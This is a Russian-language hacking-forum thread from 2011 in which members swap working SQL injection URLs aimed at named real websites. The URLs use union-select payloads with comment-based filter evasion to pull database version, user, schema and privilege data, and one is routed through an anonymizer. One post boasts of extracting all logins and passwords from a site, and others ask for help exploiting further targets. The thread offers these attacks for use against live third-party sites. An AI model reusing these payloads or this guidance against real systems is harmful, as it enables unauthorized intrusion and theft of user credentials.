HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #18861  
Старый 14.12.2011, 13:55
er9j6@
Guest
Сообщений: n/a
Провел на форуме:
107835

Репутация: 23
По умолчанию

Код:
Code:
http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=-317
Cannot get order by.. Any help please?[/QUOTE]

Цитата:
Сообщение от None  
http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=-317'+union+/*!select*/+1,2,3,4,(/*!select*/(@x)from(/*!select*/(@x:=0x00),(/*!select*/(null)from(information_schema./*!columns*/)where(table_schema!=0x696e666f726d6174696f6e5f736 368656d61)and(0x00)in(@x:=/*!concat*/(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,c olumn_name))))x),6,7,8,9,10,11,12,13+--+
 
Ответить с цитированием

  #18862  
Старый 14.12.2011, 22:14
_Spamer_
Познающий
Регистрация: 03.02.2009
Сообщений: 49
Провел на форуме:
3317712

Репутация: 403
По умолчанию

http://pavlodarauto[antiG]ru/info/view.php?id=146
 
Ответить с цитированием

  #18863  
Старый 14.12.2011, 22:25
PRosTo_LEva
Новичок
Регистрация: 18.04.2007
Сообщений: 1
Провел на форуме:
2012

Репутация: 0
По умолчанию

Цитата:
Сообщение от _Spamer_  
_Spamer_ said:
http://pavlodarauto[antiG]ru/info/view.php?id=146
Цитата:
Сообщение от None  
http://pavlodarauto.ru/bd/baraholka_view.php?id=-1+/*!union+select*/+1,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21--
Плюсек мне
 
Ответить с цитированием

  #18864  
Старый 14.12.2011, 22:25
er9j6@
Guest
Сообщений: n/a
Провел на форуме:
107835

Репутация: 23
По умолчанию

Цитата:
Сообщение от _Spamer_  
_Spamer_ said:
http://pavlodarauto[antiG]ru/info/view.php?id=146
так можно сделать

Цитата:
Сообщение от None  
http://pavlodarauto.ru/info/view.php?id=-146+union+/*!select*/+1,2,3,4,5,6,/*!concat*/(version(),0x3a,database(),0x3a,user()),8,9,10+--+
 
Ответить с цитированием

  #18865  
Старый 15.12.2011, 13:03
Zer0-Set
Guest
Сообщений: n/a
Провел на форуме:
1609

Репутация: 0
По умолчанию

Изучаю такую технологию как buffer overflow и постепенно погружаюсь в кернел хакинг, вопрос: на каком *никс дистрибутиве мне будит удобно писать ядерньки? =\ Остановился на выборе между gentoo & debian .
 
Ответить с цитированием

  #18866  
Старый 15.12.2011, 19:24
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

Цитата:
Сообщение от d1v  
d1v said:
это если юзер один.
а если юзеров > 1, то
File_Priv from mysql.user where user= 'юзер'
а как тут?

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//anonymouse.org/cgi-bin/anon-www.cgi/http://www.donaticus-him.ru/view_product.php?id=-4%27+union+select+1,2,3,4,file_priv+from+mysql.user--+

[/COLOR][/COLOR
выводит ошибку

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//anonymouse.org/cgi-bin/anon-www.cgi/http://www.donaticus-him.ru/view_product.php?id=-4%27+union+select+1,2,3,4,file_priv+from+mysql.user+where+user=%27u198287@87%27--+

[/COLOR][/COLOR
и так тоже ошибка
 
Ответить с цитированием

  #18867  
Старый 15.12.2011, 19:53
lansia1
Guest
Сообщений: n/a
Провел на форуме:
6312

Репутация: 0
По умолчанию

Цитата:
Сообщение от Datax  
Datax said:
Еще одна приватная бага ,работает на новых версиях.
Заходим например суда
http://soft.wlok.ru
Делаем запрос
http://soft.wlok.ru/soft/page/99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 999999999999999999/
Цифры девять ,нужно написать слитно.
Видим

Раскручивайте дальше сами, я например вытаскивал все пароли и логины.
Как раскручивать такие скули?
 
Ответить с цитированием

  #18868  
Старый 15.12.2011, 21:33
Kasper1898
Guest
Сообщений: n/a
Провел на форуме:
4716

Репутация: 0
По умолчанию

Подскажите
 
Ответить с цитированием

  #18869  
Старый 15.12.2011, 21:34
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Крути как обычно =/

http://site/login_login_groovy/1'+...

lansia1 чет не крутится.. Мб не скулья?
 
Ответить с цитированием

  #18870  
Старый 15.12.2011, 21:36
Kasper1898
Guest
Сообщений: n/a
Провел на форуме:
4716

Репутация: 0
По умолчанию

Ereee

Спасибо,понял)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ